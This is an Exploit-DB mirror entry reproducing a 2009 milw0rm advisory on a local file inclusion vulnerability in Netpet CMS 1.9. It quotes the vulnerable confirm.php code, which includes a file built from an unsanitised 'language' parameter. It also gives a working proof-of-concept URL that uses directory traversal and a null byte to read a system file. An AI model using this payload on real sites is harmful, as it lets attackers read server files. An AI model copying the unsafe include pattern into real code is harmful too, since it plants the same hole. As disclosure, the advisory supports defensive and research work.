exploit-db-mirror/exploits/php/webapps/9333.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
938 B
Text

############################################################################################
[+] Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################
[+] Download : http://www.netpet.at/en/downloads
[+] Local File Inclusion
- Vulnerable code in netpet/confirm.php
------------------------------------------------------------------------
$selLang = $_GET['language'];
if($selLang!=""){
include $netpetfolder."netpet/languages/".$selLang.".lang.php";
------------------------------------------------------------------------
- PoC
http://127.0.0.1/[path]/netpet/confirm.php?language=../../../../../../../boot.ini%00
############################################################################################
# milw0rm.com [2009-08-03]